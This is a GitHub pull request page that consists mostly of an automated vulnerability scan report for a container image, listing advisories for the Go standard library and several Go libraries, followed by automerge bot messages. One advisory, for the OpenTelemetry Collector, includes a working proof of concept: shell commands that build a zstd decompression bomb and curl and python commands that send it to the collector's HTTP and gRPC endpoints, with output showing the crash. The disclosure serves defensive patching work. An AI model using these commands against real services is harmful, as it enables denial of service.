Added examples for systemd units #6141
Conversation
🔍 Vulnerabilities of
digest | sha256:d660e067b50e95bb11521321faa8af32c2b7f50249db2426f333ff290102def0 |
platform | linux/amd64 |
size | 29 MB |
packages | 300 |
stdlib
Affected range | <1.21.11 |
Fixed version | 1.21.11 |
Description
The various Is methods (IsPrivate, IsLoopback, etc) did not work as expected for IPv4-mapped IPv6 addresses, returning false for addresses which would return true in their traditional IPv4 forms.
Affected range | <1.21.12 |
Fixed version | 1.21.12 |
Description
The net/http HTTP/1.1 client mishandled the case where a server responds to a request with an "Expect: 100-continue" header with a non-informational (200 or higher) status. This mishandling could leave a client connection in an invalid state, where the next request sent on the connection will fail.
An attacker sending a request to a net/http/httputil.ReverseProxy proxy can exploit this mishandling to cause a denial of service by sending "Expect: 100-continue" requests which elicit a non-informational response from the backend. Each such request leaves the proxy with an invalid connection, and causes one subsequent request using that connection to fail.
Affected range | >=1.21.0-0 |
Fixed version | 1.21.4 |
Description
The filepath package does not recognize paths with a \??\ prefix as special.
On Windows, a path beginning with \??\ is a Root Local Device path equivalent to a path beginning with \\.\. Paths with a \??\ prefix may be used to access arbitrary locations on the system. For example, the path \??\c:\x is equivalent to the more common path c:\x.
Before fix, Clean could convert a rooted path such as \a\..\??\b into the root local device path \??\b. Clean will now convert this to .\??\b.
Similarly, Join(\, ??, b) could convert a seemingly innocent sequence of path elements into the root local device path \??\b. Join will now convert this to \.\??\b.
In addition, with fix, IsAbs now correctly reports paths beginning with \??\ as absolute, and VolumeName correctly reports the \??\ prefix as a volume name.
UPDATE: Go 1.20.11 and Go 1.21.4 inadvertently changed the definition of the volume name in Windows paths starting with \\, resulting in filepath.Clean(\\?\c:) returning \\?\c: rather than \\?\c:\ (among other effects). The previous behavior has been restored.
Affected range | <1.21.11 |
Fixed version | 1.21.11 |
Description
The archive/zip package's handling of certain types of invalid zip files differs from the behavior of most zip implementations. This misalignment could be exploited to create a zip file with contents that vary depending on the implementation reading the file. The archive/zip package now rejects files containing these errors.
Affected range | >=1.21.0-0 |
Fixed version | 1.21.4 |
Description
On Windows, the IsLocal function does not correctly detect reserved device names in some cases.
Reserved names followed by spaces, such as "COM1 ", and reserved names "COM" and "LPT" followed by superscript 1, 2, or 3, are incorrectly reported as local.
With fix, IsLocal now correctly reports these names as non-local.
Affected range | >=1.21.0-0 |
Fixed version | 1.21.5 |
Description
A malicious HTTP sender can use chunk extensions to cause a receiver reading from a request or response body to read many more bytes from the network than are in the body.
A malicious HTTP client can further exploit this to cause a server to automatically read a large amount of data (up to about 1GiB) when a handler fails to read the entire body of a request.
Chunk extensions are a little-used HTTP feature which permit including additional metadata in a request or response body sent using the chunked encoding. The net/http chunked encoding reader discards this metadata. A sender can exploit this by inserting a large metadata segment with each byte transferred. The chunk reader now produces an error if the ratio of real body to encoded bytes grows too small.
Affected range | <1.21.8 |
Fixed version | 1.21.8 |
Description
If errors returned from MarshalJSON methods contain user controlled data, they may be used to break the contextual auto-escaping behavior of the html/template package, allowing for subsequent actions to inject unexpected content into templates.
Affected range | <1.21.8 |
Fixed version | 1.21.8 |
Description
The ParseAddressList function incorrectly handles comments (text within parentheses) within display names. Since this is a misalignment with conforming address parsers, it can result in different trust decisions being made by programs using different parsers.
Affected range | <1.21.8 |
Fixed version | 1.21.8 |
Description
Verifying a certificate chain which contains a certificate with an unknown public key algorithm will cause Certificate.Verify to panic.
This affects all crypto/tls clients, and servers that set Config.ClientAuth to VerifyClientCertIfGiven or RequireAndVerifyClientCert. The default behavior is for TLS servers to not verify client certificates.
Affected range | <1.21.8 |
Fixed version | 1.21.8 |
Description
When parsing a multipart form (either explicitly with Request.ParseMultipartForm or implicitly with Request.FormValue, Request.PostFormValue, or Request.FormFile), limits on the total size of the parsed form were not applied to the memory consumed while reading a single form line. This permits a maliciously crafted input containing very long lines to cause allocation of arbitrarily large amounts of memory, potentially leading to memory exhaustion.
With fix, the ParseMultipartForm function now correctly limits the maximum size of form lines.
Affected range | <1.21.8 |
Fixed version | 1.21.8 |
Description
When following an HTTP redirect to a domain which is not a subdomain match or exact match of the initial domain, an http.Client does not forward sensitive headers such as "Authorization" or "Cookie". For example, a redirect from foo.com to www.foo.com will forward the Authorization header, but a redirect to bar.com will not.
A maliciously crafted HTTP redirect could cause sensitive headers to be unexpectedly forwarded.
Affected range | <1.21.9 |
Fixed version | 1.21.9 |
Description
An attacker may cause an HTTP/2 endpoint to read arbitrary amounts of header data by sending an excessive number of CONTINUATION frames.
Maintaining HPACK state requires parsing and processing all HEADERS and CONTINUATION frames on a connection. When a request's headers exceed MaxHeaderBytes, no memory is allocated to store the excess headers, but they are still parsed.
This permits an attacker to cause an HTTP/2 endpoint to read arbitrary amounts of header data, all associated with a request which is going to be rejected. These headers can include Huffman-encoded data which is significantly more expensive for the receiver to decode than for an attacker to send.
The fix sets a limit on the amount of excess header frames we will process before closing a connection.
go.opentelemetry.io/collector/config/configgrpc 0.97.0
(golang)
pkg:golang/go.opentelemetry.io/collector/config/[email protected]
Improper Restriction of Operations within the Bounds of a Memory Buffer
Affected range | <0.102.1 |
Fixed version | 0.102.1 |
CVSS Score | 8.2 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H |
Description
Summary
An unsafe decompression vulnerability allows unauthenticated attackers to crash the collector via excessive memory consumption.
Details
The OpenTelemetry Collector handles compressed HTTP requests by recognizing the Content-Encoding header, rewriting the HTTP request body, and allowing subsequent handlers to process decompressed data. It supports the gzip, zstd, zlib, snappy, and deflate compression algorithms. A "zip bomb" or "decompression bomb" is a malicious archive designed to crash or disable the system reading it. Decompression of HTTP requests is typically not enabled by default in popular server solutions due to associated security risks. A malicious attacker could leverage this weakness to crash the collector by sending a small request that, when uncompressed by the server, results in excessive memory consumption.
During proof-of-concept (PoC) testing, all supported compression algorithms could be abused, with zstd causing the most significant impact. Compressing 10GB of all-zero data reduced it to 329KB. Sending an HTTP request with this compressed data instantly consumed all available server memory (the testing server had 32GB), leading to an out-of-memory (OOM) kill of the collector application instance.
The root cause for this issue can be found in the following code path:
Affected File:
https://github.com/open-telemetry/opentelemetry-collector/[...]confighttp/compression.go
Affected Code:
    // httpContentDecompressor offloads the task of handling compressed HTTP requests
    // by identifying the compression format in the "Content-Encoding" header and re-writing
    // request body so that the handlers further in the chain can work on decompressed data.
    // It supports gzip and deflate/zlib compression.
    func httpContentDecompressor(h http.Handler, eh func(w http.ResponseWriter, r *http.Request, errorMsg string, statusCode int), decoders map[string]func(body io.ReadCloser) (io.ReadCloser, error)) http.Handler {
        [...]
        d := &decompressor{
            errHandler: errHandler,
            base:       h,
            decoders: map[string]func(body io.ReadCloser) (io.ReadCloser, error){
                "": func(io.ReadCloser) (io.ReadCloser, error) {
                    // Not a compressed payload. Nothing to do.
                    return nil, nil
                },
                [...]
                "zstd": func(body io.ReadCloser) (io.ReadCloser, error) {
                    zr, err := zstd.NewReader(
                        body,
                        zstd.WithDecoderConcurrency(1),
                    )
                    if err != nil {
                        return nil, err
                    }
                    return zr.IOReadCloser(), nil
                },
                [...]
    }

    func (d *decompressor) ServeHTTP(w http.ResponseWriter, r *http.Request) {
        newBody, err := d.newBodyReader(r)
        if err != nil {
            d.errHandler(w, r, err.Error(), http.StatusBadRequest)
            return
        }
        [...]
        d.base.ServeHTTP(w, r)
    }

    func (d *decompressor) newBodyReader(r *http.Request) (io.ReadCloser, error) {
        encoding := r.Header.Get(headerContentEncoding)
        decoder, ok := d.decoders[encoding]
        if !ok {
            return nil, fmt.Errorf("unsupported %s: %s", headerContentEncoding, encoding)
        }
        return decoder(r.Body)
    }
To mitigate this attack vector, it is recommended to either disable support for decompressing client HTTP requests entirely or limit the size of the decompressed data that can be processed. Limiting the decompressed data size can be achieved by wrapping the decompressed data reader inside an io.LimitedReader, which restricts the reading to a specified number of bytes. This approach helps prevent excessive memory usage and potential out-of-memory errors caused by decompression bombs.
PoC
This issue was confirmed as follows:
PoC Commands:
dd if=/dev/zero bs=1G count=10 | zstd > poc.zst
curl -vv "http://192.168.0.107:4318/v1/traces" -H "Content-Type: application/x-protobuf" -H "Content-Encoding: zstd" --data-binary @poc.zst
Output:
    10+0 records in
    10+0 records out
    10737418240 bytes (11 GB, 10 GiB) copied, 12,207 s, 880 MB/s
    * processing: http://192.168.0.107:4318/v1/traces
    *   Trying 192.168.0.107:4318...
    * Connected to 192.168.0.107 (192.168.0.107) port 4318
    > POST /v1/traces HTTP/1.1
    > Host: 192.168.0.107:4318
    > User-Agent: curl/8.2.1
    > Accept: */*
    > Content-Type: application/x-protobuf
    > Content-Encoding: zstd
    > Content-Length: 336655
    >
    * We are completely uploaded and fine
    * Recv failure: Connection reset by peer
    * Closing connection
    curl: (56) Recv failure: Connection reset by peer
Server logs:
    otel-collector-1 | 2024-05-30T18:36:14.376Z info [email protected]/service.go:102 Setting up own telemetry...
    [...]
    otel-collector-1 | 2024-05-30T18:36:14.385Z info [email protected]/otlp.go:152 Starting HTTP server {"kind": "receiver", "name": "otlp", "data_type": "traces", "endpoint": "0.0.0.0:4318"}
    otel-collector-1 | 2024-05-30T18:36:14.385Z info [email protected]/service.go:195 Everything is ready. Begin running and processing data.
    otel-collector-1 | 2024-05-30T18:36:14.385Z warn localhostgate/featuregate.go:63 The default endpoints for all servers in components will change to use localhost instead of 0.0.0.0 in a future version. Use the feature gate to preview the new default. {"feature gate ID": "component.UseLocalHostAsDefaultHost"}
    otel-collector-1 exited with code 137
A similar problem exists for configgrpc when using the zstd compression:
dd if=/dev/zero bs=1G count=10 | zstd > poc.zst
python3 -c 'import os, struct; f = open("/tmp/body.raw", "w+b"); f.write(b"\x01"); f.write(struct.pack(">L", os.path.getsize("poc.zst"))); f.write(open("poc.zst", "rb").read())'
curl -vv http://127.0.0.1:4317/opentelemetry.proto.collector.trace.v1.TraceService/Export --http2-prior-knowledge -H "content-type: application/grpc" -H "grpc-encoding: zstd" --data-binary @/tmp/body.raw
Impact
Unauthenticated attackers can crash the collector via excessive memory consumption, stopping the entire collection of telemetry.
Patches
- The confighttp module version 0.102.0 contains a fix for this problem.
- The configgrpc module version 0.102.1 contains a fix for this problem.
- All official OTel Collector distributions starting with v0.102.1 contain both fixes.
Workarounds
- None.
References
- [confighttp] Apply MaxRequestBodySize to the result of a decompressed body open-telemetry/opentelemetry-collector#10289
- [configgrpc] Use own compressors for zstd open-telemetry/opentelemetry-collector#10323
- https://opentelemetry.io/blog/2024/cve-2024-36129/
Credits
This issue was uncovered during a security audit performed by 7ASecurity, facilitated by OSTIF, for the OpenTelemetry project.
github.com/mostynb/go-grpc-compression 1.2.2
(golang)
pkg:golang/github.com/mostynb/[email protected]
Uncontrolled Resource Consumption
Affected range | >=1.1.4 |
Fixed version | 1.2.3 |
CVSS Score | 7.5 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
Description
Impact
A malicious user could cause a denial of service (DoS) when using a specially crafted gRPC request. The decompression mechanism for zstd did not respect the limits imposed by gRPC, allowing rapid memory usage increases.
Versions v1.1.4 through to v1.2.2 made use of the Decoder.DecodeAll function in github.com/klauspost/compress/zstd to decompress data provided by the peer. The vulnerability is exploitable only by attackers who can send gRPC payloads to users of github.com/mostynb/go-grpc-compression/zstd or github.com/mostynb/go-grpc-compression/nonclobbering/zstd.
Patches
Version v1.2.3 of github.com/mostynb/go-grpc-compression avoids the issue by not using the Decoder.DecodeAll function in github.com/klauspost/compress/zstd.
All users of github.com/mostynb/go-grpc-compression/zstd or github.com/mostynb/go-grpc-compression/nonclobbering/zstd in the affected versions should update to v1.2.3.
Workarounds
Other compression formats were not affected; users may consider switching from zstd to another format without upgrading to a newer release.
References
This issue was uncovered during a security audit performed by Miroslav Stampar of 7ASecurity, facilitated by OSTIF, for the OpenTelemetry project.
https://opentelemetry.io/blog/2024/cve-2024-36129
GHSA-c74f-6mfw-mm4v
go.opentelemetry.io/collector/config/confighttp 0.97.0
(golang)
pkg:golang/go.opentelemetry.io/collector/config/[email protected]
Improper Restriction of Operations within the Bounds of a Memory Buffer
Affected range | <0.102.0 |
Fixed version | 0.102.0 |
CVSS Score | 8.2 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H |
Description
Same advisory as the configgrpc 0.97.0 entry above (unsafe decompression, CVE-2024-36129): unauthenticated attackers can crash the collector via excessive memory consumption triggered by a zstd decompression bomb. See that entry for the full details, PoC, patches, workarounds, references, and credits. The confighttp fix shipped in module version 0.102.0.
github.com/aws/aws-sdk-go 1.51.11
(golang)
pkg:golang/github.com/aws/[email protected]
Affected range | >=0 |
Fixed version | Not Fixed |
Description
The Go AWS S3 Crypto SDK contains vulnerabilities that can permit an attacker with write access to a bucket to decrypt files in that bucket.
Files encrypted by the V1 EncryptionClient using either the AES-CBC content cipher or the KMS key wrap algorithm are vulnerable. Users should migrate to the V1 EncryptionClientV2 API, which will not create vulnerable files. Old files will remain vulnerable until re-encrypted with the new client.
github.com/rs/cors 1.10.1
(golang)
pkg:golang/github.com/rs/[email protected]
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Affected range | >=1.9.0 |
Fixed version | 1.11.0 |
Description
Middleware causes a prohibitive amount of heap allocations when processing malicious preflight requests that include an Access-Control-Request-Headers (ACRH) header whose value contains many commas. Attackers can abuse this behavior to produce undue load on the middleware/server in an attempt to cause a denial of service.
github.com/azure/azure-sdk-for-go/sdk/azidentity 1.4.0
(golang)
pkg:golang/github.com/azure/azure-sdk-for-go/sdk/[email protected]
Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
Affected range | <1.6.0 |
Fixed version | 1.6.0 |
CVSS Score | 5.5 |
CVSS Vector | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N |
Description
Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability.
Attempting automerge. See https://github.com/uniget-org/tools/actions/runs/10106715866.
PR is blocked and can not be merged. See https://github.com/uniget-org/tools/actions/runs/10106715866.
Attempting automerge. See https://github.com/uniget-org/tools/actions/runs/10107521537.
PR is blocked and can not be merged. See https://github.com/uniget-org/tools/actions/runs/10107521537.
Force-pushed from ed5c754 to 2456789 (Compare)
Attempting automerge. See https://github.com/uniget-org/tools/actions/runs/10117261477.
PR is blocked and can not be merged. See https://github.com/uniget-org/tools/actions/runs/10117261477.
Attempting automerge. See https://github.com/uniget-org/tools/actions/runs/10141230983.
Attempting automerge. See https://github.com/uniget-org/tools/actions/runs/10141448857.